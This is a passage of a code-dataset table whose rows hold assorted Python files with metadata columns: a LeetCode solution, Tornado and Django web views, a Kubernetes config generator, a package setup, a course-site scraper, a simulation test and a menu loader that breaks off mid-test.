hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a31c4a4e0fe5dc12cc9ca8b45190499c5c2d8d7c | 764 | py | Python | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/5/414.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def XXX(self, s: str) -> str:
# 1025 third coding two pointers
n = len(s)
if n<=1: return s
def isValid(left,right,maxlen,res):#中心扩展法的复杂度更低,减少一层循环!
while left>=0 and right<n and s[left]==s[right]:
#如果把s[left]==s[right]放在下边判断,需要讨论left和right取值!
if right-left+1>maxlen:
maxlen = right-left+1
res = s[left:right+1]#提前记录结果,不许再修改left和right取值
left-=1
right+=1
return maxlen, res
maxlen = 0
res = ''
for i in range(n-1):#依次访问各个点,指针的起点!
maxlen,res = isValid(i,i,maxlen,res)
maxlen,res = isValid(i,i+1,maxlen,res)
return res
| 31.833333 | 66 | 0.5 | 97 | 764 | 3.938144 | 0.391753 | 0.141361 | 0.052356 | 0.089005 | 0.094241 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029787 | 0.384817 | 764 | 23 | 67 | 33.217391 | 0.782979 | 0.171466 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3250ae256c079f8ab4462143988bb1f83ef4d63 | 1,352 | py | Python | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | api/user.py | yishuangxi/car-tornado | bff2a77569ca9b2eee9298b64078d6b533ac280f | [
"MIT"
] | null | null | null | # coding=utf8
from base import ApiBase
from tornado.gen import coroutine, Return
from service.user import ServiceUser
class ApiUserBase(ApiBase):
def __init__(self, *args, **kwargs):
super(ApiUserBase, self).__init__(*args, **kwargs)
self.srv_user = ServiceUser()
class ApiUserLogin(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
user = self.srv_user.find_one_by_username_password(username, password)
if user:
pass
else:
pass
class ApiUserDetail(ApiUserBase):
@coroutine
def get(self, user_id):
user = yield self.srv_user.find_one_by_id(user_id)
self.json_success(data=user)
class ApiUserRegister(ApiUserBase):
@coroutine
def post(self, *args, **kwargs):
username = self.get_argument('username')
password = self.get_argument('password')
phone = self.get_argument('phone')
sex = self.get_argument('sex')
valid, msg = yield self.srv_user.check_register(username, password, phone, sex)
if not valid:
self.json_error(msg=msg)
else:
user_id = yield self.srv_user.create(username, password, phone, sex)
self.json_success(data=user_id)
| 26.509804 | 87 | 0.650888 | 162 | 1,352 | 5.222222 | 0.308642 | 0.049645 | 0.106383 | 0.056738 | 0.345154 | 0.29078 | 0.243499 | 0.243499 | 0.243499 | 0.243499 | 0 | 0.000978 | 0.244083 | 1,352 | 50 | 88 | 27.04 | 0.82681 | 0.008136 | 0 | 0.371429 | 0 | 0 | 0.02994 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0.2 | 0.085714 | 0 | 0.314286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a32551bf11b157b158593f1dc1d29f74c491413f | 3,632 | py | Python | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | rbe_benchmarks/tools/generate_yml.py | jiyangchen/benchmarks | cfc870bd2871072accf8cef14b03edcb963bf62b | [
"Apache-2.0"
] | null | null | null | """Generates Kubernetes config yml file from benchmark_configs.yml file.
This script should only be run from opensource repository.
"""
import argparse
import logging
import os
from string import maketrans
import k8s_tensorflow_lib
import yaml
_TEST_NAME_ENV_VAR = 'TF_DIST_BENCHMARK_NAME'
_PORT = 5000
def _ConvertToValidName(name):
"""Converts to name that we can use as a kubernetes job prefix.
Args:
name: benchmark name.
Returns:
Benchmark name that can be used as a kubernetes job prefix.
"""
return name.translate(maketrans('/:_', '---'))
def _GetGpuVolumeMounts(flags):
"""Get volume specs to add to Kubernetes config.
Args:
flags: flags
Returns:
Volume specs in the format: volume_name: (hostPath, podPath).
"""
volume_specs = {}
if flags.nvidia_lib_dir:
volume_specs['nvidia-libraries'] = (flags.nvidia_lib_dir, '/usr/lib/nvidia')
if flags.cuda_lib_dir:
cuda_library_files = ['libcuda.so', 'libcuda.so.1', 'libcudart.so']
for cuda_library_file in cuda_library_files:
lib_name = cuda_library_file.split('.')[0]
volume_specs['cuda-libraries-%s' % lib_name] = (
os.path.join(flags.cuda_lib_dir, cuda_library_file),
os.path.join('/usr/lib/cuda/', cuda_library_file))
return volume_specs
def main():
parser = argparse.ArgumentParser()
parser.register(
'type', 'bool', lambda v: v.lower() in ('true', 't', 'y', 'yes'))
parser.add_argument(
'--benchmark_configs_file', type=str, default=None, required=True,
help='YAML file with benchmark configs.')
parser.add_argument(
'--benchmark_config_output', type=str, default=None, required=True,
help='YAML file to store final config.')
parser.add_argument(
'--docker_image', type=str, default=None, required=True,
help='Docker iage to use on K8S to run test.')
parser.add_argument(
'--cuda_lib_dir', type=str, default=None, required=False,
help='Directory where cuda library files are located on gcloud node.')
parser.add_argument(
'--nvidia_lib_dir', type=str, default=None, required=False,
help='Directory where nvidia library files are located on gcloud node.')
flags, _ = parser.parse_known_args()
logging.basicConfig(level=logging.DEBUG)
config_base_path = os.path.dirname(__file__)
config_text = open(
os.path.join(config_base_path, flags.benchmark_configs_file), 'r').read()
configs = yaml.load(config_text)
# TODO(annarev): run benchmarks in parallel instead of sequentially.
for config in configs:
name = _ConvertToValidName(str(config['benchmark_name']))
env_vars = {
_TEST_NAME_ENV_VAR: name
}
gpu_count = (0 if 'gpus_per_machine' not in config
else config['gpus_per_machine'])
volumes = {}
if gpu_count > 0:
volumes = _GetGpuVolumeMounts(flags)
env_vars['LD_LIBRARY_PATH'] = (
'/usr/lib/cuda:/usr/lib/nvidia:/usr/lib/x86_64-linux-gnu')
env_vars.update(config.get('env_vars', {}))
args = config.get('args', {})
kubernetes_config = k8s_tensorflow_lib.GenerateConfig(
config['worker_count'],
config['ps_count'],
_PORT,
request_load_balancer=False,
docker_image=flags.docker_image,
name_prefix=name,
additional_args=args,
env_vars=env_vars,
volumes=volumes,
use_shared_volume=False,
use_cluster_spec=False,
gpu_limit=gpu_count)
with open(flags.benchmark_config_output, 'w') as output_config_file:
output_config_file.write(kubernetes_config)
if __name__ == '__main__':
main()
| 30.266667 | 80 | 0.688877 | 484 | 3,632 | 4.911157 | 0.330579 | 0.032394 | 0.035759 | 0.037863 | 0.164914 | 0.146403 | 0.124527 | 0.081615 | 0.081615 | 0.046277 | 0 | 0.005128 | 0.194659 | 3,632 | 119 | 81 | 30.521008 | 0.807521 | 0.138491 | 0 | 0.064103 | 1 | 0.012821 | 0.201295 | 0.040777 | 0 | 0 | 0 | 0.008403 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0 | 0.141026 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a327e559ec1007ff0c6e601f9102a6d72e363ee4 | 676 | py | Python | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 2 | 2021-07-05T03:43:35.000Z | 2021-07-05T11:39:49.000Z | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 1 | 2021-03-31T04:16:45.000Z | 2021-03-31T04:16:45.000Z | models/wrf_hydro/hydro_dart_py/setup.py | hkershaw-brown/feature-preprocess | fe2bd77b38c63fa0566c83ebc4d2fac1623aef66 | [
"Apache-2.0"
] | 1 | 2020-11-20T23:36:16.000Z | 2020-11-20T23:36:16.000Z | from setuptools import find_packages, setup
setup(
name='hydrodartpy',
version='0.0.1',
packages=find_packages(),
package_data={'hydrodartpy': ['core/data/*']},
url='https://github.com/NCAR/wrf_hydro_dart',
license='MIT',
install_requires=[
'boltons',
'datetime',
'deepdiff',
'f90nml',
'netCDF4',
'pandas',
'pathlib',
'pytest',
'pytest-html',
'pytest-datadir-ng',
'pywrfhydro',
'wrfhydropy',
'xarray',
'ruamel.yaml'
],
author='James McCreight',
author_email='jamesmcc@ucar.edu',
description='API for wrf_hydro_dart',
)
| 22.533333 | 50 | 0.554734 | 65 | 676 | 5.630769 | 0.8 | 0.065574 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012422 | 0.285503 | 676 | 29 | 51 | 23.310345 | 0.745342 | 0 | 0 | 0 | 0 | 0 | 0.37426 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.035714 | 0 | 0.035714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a32e4db7bc30f0df393066446313d79fe0f329a5 | 3,296 | py | Python | core/views.py | dishad/ADD | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | null | null | null | core/views.py | dishad/ADD | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | 4 | 2016-11-26T19:10:01.000Z | 2016-12-24T10:42:16.000Z | core/views.py | dishad/deanslist | 51455c493a4eb433eb1d8dde44771e917efcb500 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.template import Context, loader
from django.contrib.auth.decorators import login_required, user_passes_test
from django.contrib.auth import authenticate
from django.contrib.auth import login as login_user
from django.contrib.auth import logout as logout_user
from django.contrib.auth.models import User
from core.models import Category, Post
from core.forms import CreateAccForm, ForgotPasswordForm, PostForm
@login_required
def index(request):
newpostform = PostForm()
return render(request, 'core/index.html',
{
'categories': get_categories(),
'form': newpostform
})
def login(request):
# request is post, log in
if request.method == 'POST':
username = request.POST["username"]
password = request.POST["password"]
user = authenticate(username=username, password=password)
if user is not None:
login_user(request, user)
return HttpResponseRedirect('/')
else:
return HttpResponse('Error: could not log in')
else:
# request is get, display page
t = loader.get_template('core/login.html')
c = Context()
return HttpResponse(t.render(c))
def logout(request):
logout_user(request)
return redirect('%s?next=%s', (settings.LOGIN_URL, request.path))
# create account view
def createacc(request):
form = CreateAccForm()
if request.method == "POST":
form = CreateAccForm(request.POST)
if form.is_valid():
print("about to create new user")
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
username = form.cleaned_data.get('username')
email = form.cleaned_data.get('email')
password = form.cleaned_data.get('password')
new_user = User.objects.create_user(first_name=first_name, last_name=last_name, username=username, email=email, password=password)
new_user = authenticate(username=username, password=password)
if new_user:
login_user(request, new_user)
print("new user created: " + new_user.get_username() + " " + new_user.get_full_name())
return HttpResponseRedirect('/');
else:
print('failed to authenticate user')
else:
print("invalid form")
return render(request, 'core/createacc.html', {'form': form})
else:
return render(request, 'core/createacc.html', {'form': form})
# forgot password
def forgotpassword(request):
#if request.method == 'POST'
#TODO: forgot password functionality
#else
return render(request, 'core/forgotpassword.html', {'form': form})
def newpost(request):
form = PostForm(request.POST)
if form.is_valid():
cur_user = request.user
title = form.cleaned_data.get('title')
price = form.cleaned_data.get('price')
description = form.cleaned_data.get('description')
poster = cur_user.id
category = form.cleaned_data.get('category')
subcategory = form.cleaned_data.get('subcategory')
Post.objects.create(title=title, price=price, description=description, poster=poster, category=category)
HttpResponseRedirect('/newpostsuccess')
else:
print('form not valid')
HttpResponseRedirect('/')
def newpostsuccess(request):
return render(request, 'core/newpostsuccess.html')
def get_categories():
return Category.objects.all()
| 24.969697 | 133 | 0.739078 | 421 | 3,296 | 5.679335 | 0.228029 | 0.046006 | 0.062735 | 0.075282 | 0.176077 | 0.098703 | 0.078628 | 0.036805 | 0 | 0 | 0 | 0 | 0.140777 | 3,296 | 131 | 134 | 25.160305 | 0.84428 | 0.047027 | 0 | 0.123457 | 0 | 0 | 0.125479 | 0.015326 | 0 | 0 | 0 | 0.007634 | 0 | 1 | 0.098765 | false | 0.111111 | 0.135802 | 0.037037 | 0.37037 | 0.061728 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a32f8483b338b36563493c6ba6c4c80894f08bdb | 3,706 | py | Python | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | 2 | 2018-03-24T10:55:31.000Z | 2018-03-24T10:56:13.000Z | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | null | null | null | pachong.py | echo6120/pythonhomework | e4b89f2aa3632f39dafcf95860dc1616727b7647 | [
"MIT"
] | 1 | 2019-10-10T12:58:51.000Z | 2019-10-10T12:58:51.000Z | #coding=utf-8
#抓取精品课网站中的课程,把有优惠券的课程筛选出来
#第一步:访问ke.youdao.com 获取精品课网页的所有的标签内容,例如:四六级,考研,实用英语...:
#第二步:访问标签页,获取课程详情页的url
#第三步:获取课程详情页需要的信息
#第四步:保存到Excel表中
import requests
import urllib3
import re
import sys
from bs4 import BeautifulSoup
from openpyxl import Workbook
from openpyxl import load_workbook
#抓取标签,"http://ke.youdao.com"
def get_labels(url,label_file):
urllib3.disable_warnings()
resq = requests.get(url,verify=False).text
labels = re.findall(r"href=\"(/tag/\d+)",resq)
valid_labellink=[]
for label in labels:
valid_labellink.append(url+label)
with open(label_file,"w") as fp:
for i in set(valid_labellink):
fp.writelines(i+"\n")
print "labes url get done"
#通过标签抓取课程详情页url
def get_kelink(labellink_file,kelink_file):
valid_kelink=[]
with open(labellink_file) as fp:
for line in fp:
requests.packages.urllib3.disable_warnings()
resq1=requests.get(line.strip(),verify=False).text
ke_urls = re.findall(r"href=\"(https://ke\.youdao\.com/course/detail/\d+)",resq1)
for kelink in ke_urls:
valid_kelink.append(kelink.strip())
with open(kelink_file,"w")as fp1:
for kelink in set(valid_kelink):
fp1.writelines(kelink+"\n")
print "ke url get done"
#爬取课程名称,价格,开课时间,主讲老师
def get_courseinfo(kelink_file):
result=[]
with open(kelink_file) as fp:
for keurl in fp:
urllib3.disable_warnings()
resq2 = requests.get(keurl.strip(),verify=False).text
soup = BeautifulSoup(resq2,'html.parser')
try:
#names = soup.select("div.info.info-without-video > h1")
names = soup.select("div.g-w.body > div > h1")
teachernames = soup.select("div.g-w.body > div > p")
coursetimes = soup.select("div.g-w.body > div > p")
if names!=None and teachernames!=None and coursetimes!=None:
data = {
'name': str(names[0]).strip().strip('<h1>').strip('</h1>'),
'teachername:': str(teachernames[0]).strip().strip("<p>").strip("</p>"),
'coursetimes': str(coursetimes[1]).strip().strip("<p>").strip("</p>"),
'url': keurl.strip()
}
result.append(data)
#print data
else:
print u"有属性为空了,skip skip"
except Exception, e:
print e
return result
#将爬虫下来的内容保存在Excel
def write_excel(filename,result):
wb = load_workbook(filename)
wb.guess_types = True
ws=wb.active
#excel表中有多少行,Excel的行和列是从第一行列开始的
for i in range(1,len(result)+1):
#取result列表中的每个data,每个data为一行
result_item = result[i-1]
#默认从第一列开始
column_num=1
#遍历字典data,每个属性增加一列
for key,value1 in result_item.items():
if value1.strip() != None:
ws.cell(row=i,column=column_num,value=value1)
column_num+=1
wb.save(filename)
def main():
'''
#抓去ke.youdao.com上面的标签
url="https://ke.youdao.com"
label_filename="d:\\label.txt"
get_labels(url,label_filename)
#抓取课程详情页的url
kelink_file="d:\\kelink.txt"
get_kelink(label_filename,kelink_file)
'''
kelink_file = "d:\\kelink.txt"
#抓取课程详细信息
get_courseinfo(kelink_file)
result = get_courseinfo(kelink_file)[1:10]
write_excel("d:\\test.xlsx",result)
if __name__=="__main__":
reload(sys)
sys.setdefaultencoding("utf-8")
main()
| 31.948276 | 100 | 0.578251 | 445 | 3,706 | 4.698876 | 0.361798 | 0.043042 | 0.024868 | 0.032999 | 0.095648 | 0.03252 | 0.03252 | 0.021999 | 0 | 0 | 0 | 0.011792 | 0.29061 | 3,706 | 115 | 101 | 32.226087 | 0.783568 | 0.100378 | 0 | 0.026316 | 0 | 0 | 0.077223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.092105 | null | null | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a3333b4a0600b9d0895d786748402493b643bfc1 | 1,895 | py | Python | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | tests/test_accis_ex/test_accis.py | dsanchez-garcia/accim | 0f64df81a9ecd8424317f9213d90d802e8282c9f | [
"MIT"
] | null | null | null | from accim.sim import accis
def test_addAccis():
from accim.sim import accis
from os import listdir
scriptTypeList = ['ex_mm', 'ex_ac']
outputsList = ['simplified', 'standard', 'timestep']
EPlist = ['ep95']
for i in scriptTypeList:
for j in outputsList:
for k in EPlist:
accis.addAccis(
ScriptType=i,
Outputs=j,
EnergyPlus_version=k,
AdapStand=[1],
CAT=[1],
ComfMod=[1],
HVACmode=[2],
VentCtrl=[0],
VSToffset=[0],
MinOToffset=[50],
MaxWindSpeed=[50],
ASTtol_start=0.1,
ASTtol_end_input=0.1,
ASTtol_steps=0.1,
NameSuffix=i+'_'+j,
verboseMode=False,
confirmGen=True
)
expectedNames = [
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_simplified.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_standard.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_0[VC_X[VO_X[MT_X[MW_X[AT_0.1[ex_ac_timestep.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_simplified.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_standard.idf',
'TestModel_ExistingHVAC_PTAC_pymod[AS_EN16798[CA_1[CM_1[HM_2[VC_0[VO_0[MT_50[MW_50[AT_0.1[ex_mm_timestep.idf',
]
actualNames = [i for i in listdir() if i.endswith('.idf') and '_pymod' in i]
for i in range(len(actualNames)):
assert actualNames[i] == expectedNames[i]
| 42.111111 | 120 | 0.584169 | 273 | 1,895 | 3.710623 | 0.274725 | 0.017769 | 0.148075 | 0.17769 | 0.504442 | 0.459033 | 0.459033 | 0.459033 | 0.459033 | 0.459033 | 0 | 0.073004 | 0.306069 | 1,895 | 44 | 121 | 43.068182 | 0.697338 | 0 | 0 | 0.05 | 0 | 0.15 | 0.364644 | 0.337731 | 0 | 0 | 0 | 0 | 0.025 | 1 | 0.025 | false | 0 | 0.075 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a333816616f27fa0708f60bb8239202a5cc3a6e2 | 3,553 | py | Python | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | null | null | null | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | null | null | null | menu.py | chatea/948 | bde99bbaef78650b3ebafef3f24f87f72f4a0a8d | [
"MIT"
] | 2 | 2016-08-19T06:05:59.000Z | 2016-08-20T00:26:52.000Z | # -*- coding: utf-8 -*-
import json
import csv
import logging
_TEST_MENU_ID = u'-1'
_KEY_MENU_ID = u'menu_id'
_KEY_MENU_NAME = u'name'
_KEY_MENU_TITLE = u'title'
_KEY_MENU_IMAGE_URL = u'image_url'
_KEY_MENU_PATH = u'path_to_file'
KEY_ITEM_ID = u'id'
KEY_ITEM_NAME = u'name'
KEY_ITEM_ITEMS = u'items'
KEY_ITEM_IMAGE_URL = u"image_url"
KEY_ITEM_PRICE = u'prices'
KEY_ITEM_CATEGORY = u'category'
def load_csv(filename):
""" load a CSV file, output is a dictionary
Args:
filename: the full file path for read
Return:
A dictionary
"""
with file(filename, 'rb') as csvfile:
ret = {}
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
headers = reader.next()
headers = [unicode(w, 'utf-8') for w in headers]
for row in reader:
item_id = unicode(row[0], 'utf-8')
items = {}
for i in xrange(0, len(row)):
if headers[i] == KEY_ITEM_ITEMS:
key = headers[i]
dumped_items = json.loads(row[i])
items[key] = [str(i).decode('utf-8') for i in dumped_items]
else:
items[headers[i]] = unicode(row[i], 'utf-8')
ret[item_id] = items
return ret
print "import menu list"
menu_map = load_csv('menulist.csv')
print "import menu list complete:"
def get_menu_list():
global menu_map
return menu_map
def get_menu(menu_id):
""" get menu by menu id
Return:
return menu if exist, else None
"""
global menu_map
global _KEY_MENU_PATH
menu_id = str(menu_id).encode('utf-8')
if menu_id not in menu_map:
return None
menu_item = menu_map[menu_id]
file_path = menu_item[_KEY_MENU_PATH]
return load_csv(file_path)
def test():
menu_list = get_menu_list()
assert menu_list is not None, "Cannot find menu list!"
test_menu = get_menu(_TEST_MENU_ID)
assert test_menu is not None, "Cannot find test menu"
assert test_menu[u'0'][KEY_ITEM_ID] == u'0', "id is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_ITEMS] == [u'0'], "items are not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_NAME] == u'海帶', "name is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_PRICE] == u'30', "price is not correct for item id 0"
assert test_menu[u'0'][KEY_ITEM_CATEGORY] == u'海鮮', "cateogry is not correct for item id 0"
assert test_menu[u'1'][KEY_ITEM_ID] == u'1', "id is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_ITEMS] == [u'1'], "items are not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_NAME] == u'王子麵', "name is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_PRICE] == u'20', "price is not correct for item id 1"
assert test_menu[u'1'][KEY_ITEM_CATEGORY] == u'', "cateogry is not correct for item id 1"
assert test_menu[u'2'][KEY_ITEM_ID] == u'2', "id is not correct for item id 2"
assert test_menu[u'2'][KEY_ITEM_ITEMS] == [u'0',u'1'], "items are not correct for item id 2"
